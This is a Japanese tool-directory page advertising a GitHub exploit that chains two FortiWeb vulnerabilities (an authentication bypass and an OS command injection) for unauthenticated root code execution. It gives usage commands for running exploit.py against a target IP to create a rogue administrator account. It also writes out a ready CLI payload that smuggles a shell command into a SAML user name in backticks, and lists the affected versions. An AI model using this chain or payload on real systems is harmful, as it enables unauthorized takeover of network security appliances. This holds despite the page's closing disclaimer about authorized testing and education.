Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-64446_CVE-2025-58034 — FortiWeb のリモートコード実行(RCE)エクスプロイト(CVE-2025-64446 + CVE-2025-58034 チェーン経由) | Kitploit
ツール/GitHubGitHub/lincemorado97/cve-2025-64446_cve-2025-58034
認証と認可脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール学習と教育レッドチーミング

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
lincemorado97/cve-2025-64446_cve-2025-58034

CVE-2025-64446_CVE-2025-58034

FortiWeb のリモートコード実行(RCE)エクスプロイト(CVE-2025-64446 + CVE-2025-58034 チェーン経由)

リポジトリを見る
1459ヶ月前未レビュー

CVE-2025-64446 + CVE-2025-58034 チェーンによる FortiWeb リモートコード実行 (RCE) エクスプロイト

説明

このスクリプトは、Fortinet FortiWeb の2つの重要な脆弱性を連鎖させ、認証なしのリモートコード実行 を root 権限で達成します。

  1. CVE-2025-64446 – Relative Path Traversal による認証バイパス
    認証されていない攻撃者が認証をバイパスし、新しい管理アカウントを作成することを可能にします。

  2. CVE-2025-58034 – 認証済み OS コマンドインジェクション
    認証された攻撃者(手順1で作成したアカウントを使用)は、細工された HTTP リクエストを介して root として任意の OS コマンドを実行できます。

これら2つの脆弱性を組み合わせることで、攻撃者は事前の認証情報なしに、ゼロアクセスから完全なシステム侵害に至ることができます。

最終的な影響: 認証なしのリモートコード実行(rootシェル相当)

脆弱性の詳細

CVE-2025-64446 – 認証バイパス(Relative Path Traversal)

  • タイプ: 認証バイパスにつながる Relative Path Traversal
  • 重要度: 重大 (CVSS 3.1 基本スコア: 9.8)
  • CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • 影響を受けるバージョン:
    • FortiWeb 8.0.0 – 8.0.1
    • FortiWeb 7.6.0 – 7.6.4
    • FortiWeb 7.4.0 – 7.4.9
    • FortiWeb 7.2.0 – 7.2.11
    • FortiWeb 7.0.0 – 7.0.11

CVE-2025-58034 – 認証済み OS コマンドインジェクション

  • CVE: CVE-2025-58034
  • タイプ: OS コマンドで使用される特殊要素の不適切な無効化 (OS コマンドインジェクション) – [CWE-78]
  • 重要度: 重大
  • 説明:
    認証された攻撃者は、特別に細工された HTTP リクエストまたは CLI コマンドを介して、基盤となるシステム上で任意のオペレーティングシステムコマンドを実行できます。
  • 影響を受けるバージョン(このCVEによって拡大):
    • FortiWeb 8.0.0 – 8.0.1
    • FortiWeb 7.6.0 – 7.6.5 (注: 7.6.5 を含む)
    • FortiWeb 7.4.0 – 7.4.10 (注: 7.4.10 を含む)
    • FortiWeb 7.2.0 – 7.2.11
    • FortiWeb 7.0.0 – 7.0.11

統合攻撃チェーン:

  1. CVE-2025-64446 を利用 → 管理アカウントを作成(認証不要)
  2. 新しく作成した管理アカウントでログイン
  3. CVE-2025-58034 を利用 → root として任意の OS コマンドを実行

使用方法

  1. リポジトリをクローン:

    root@kitploit:~
    git clone https://github.com/lincemorado97/CVE-2025-64446_CVE-2025-58034
    cd CVE-2025-64446_CVE-2025-58034
    
  2. 依存関係をインストール:

    root@kitploit:~
    pip install -r requirements.txt
    
  3. フルエクスプロイトを実行(管理者作成+コマンド実行):

    root@kitploit:~
    python exploit.py <target_ip> [-u <username>] [-p <password>]
    
    • <target_ip>: 脆弱な FortiWeb アプライアンスのIPアドレスまたはホスト名。これは必須引数です。
    • -u <username> (オプション): 作成する管理アカウントのカスタムユーザー名を指定します。指定されない場合は UUID が使用されます。
    • -p <password> (オプション): 作成する管理アカウントのカスタムパスワードを指定します。指定されない場合は、ユーザー名がパスワードとして使用されます。

    例:

    root@kitploit:~
    python exploit.py 192.168.1.100 -u admin123 -p password456
    

    これは、192.168.1.100 のターゲットアプライアンス上で、ユーザー名 'admin123'、パスワード 'password456' の管理アカウントを作成しようとします。

    ユーザー名とパスワードが指定されない場合:

    root@kitploit:~
    python exploit.py 192.168.1.100
    

    スクリプトはユーザー名にランダムなUUIDを生成し、それをパスワードとして使用します。

デモンストレーション

ステップ1: 認証バイパスと管理者作成 (CVE-2025-64446)

exploit

verification

ステップ2: root としてのリモートコード実行 (CVE-2025-58034)

新しく作成した管理アカウントで正常にログインした後、攻撃者は特別に細工されたリクエストを介して、または FortiWeb CLI を直接使用して、認証済みのコマンドインジェクション脆弱性を悪用できます。

信頼性の高い悪用方法の1つは、以下の CLI コマンドを使用することです(認証後の FortiWeb コマンドラインインターフェースから実行):

root@kitploit:~
config user saml-user

edit "`<YOUR COMMAND>`"

set entityID http://foo

set service-path /foo

set enforce-signing disable

set slo-bind post

set slo-path /foo

set sso-bind post

set sso-path /foo

end

root-shell rce-demo

確認

実行後:

  • コマンド結果の出力を確認(例:uid=0(root) gid=0(root) が root RCE を確認)
  • 作成した認証情報で SSH(キーを追加した場合)または Web インターフェースからログイン

参考文献

  • CVE-2025-64446 – https://nvd.nist.gov/vuln/detail/CVE-2025-64446
  • CVE-2025-58034 – https://nvd.nist.gov/vuln/detail/CVE-2025-58034
  • Fortinet PSIRT Advisories: https://www.fortinet.com/support/psirt
  • 分析: https://attackerkb.com/topics/zClpINmLCh/cve-2025-58034/rapid7-analysis

免責事項: このツールは、許可されたセキュリティテストおよび教育目的でのみ提供されます。所有していない、または明示的なテスト許可がないシステムに対する不正使用は違法です。

ツールをダウンロード